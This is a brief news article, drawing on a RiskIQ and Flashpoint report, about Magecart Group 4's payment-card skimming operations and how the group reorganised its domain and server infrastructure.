There are at least a dozen Magecart groups that try to plant their code for skimming payment card data on online stores, but not all of them are equally advanced. Group 4 has taken cybercrime activity to a professional level.
The way the group set up their business describes an actor sufficiently capable to come up with new ways to keep the activity going, minimize risks, and make improvements.
Magecart groups have been active since 2015; they plant on web pages with payment forms a malicious script that steals the payment data the customer enters at checkout.
Carefully organized infrastructure
According to RiskIQ, a cyber-security company that follows the activity and classifies Magecart groups, a particular operator stands out of the bunch.
In collaboration with Flashpoint, the company released a thorough report about the Magecart adversary, detailing the tactics observed.
After bringing down parts of the infrastructure used by Group 4, RiskIQ was able to keep monitoring its activity and to note an evolved operation.
With about 100 domains registered and a pool of servers for routing them and supplying the card skimming code to victims, the researchers see the group as “one of the most advanced groups we’ve encountered given their rich history in the e-crime ecosystem.”
After re-organizing themselves, this Magecart adversary now uses only up to five domains on one IP address and makes sure there is no overlapping with domains outside its control.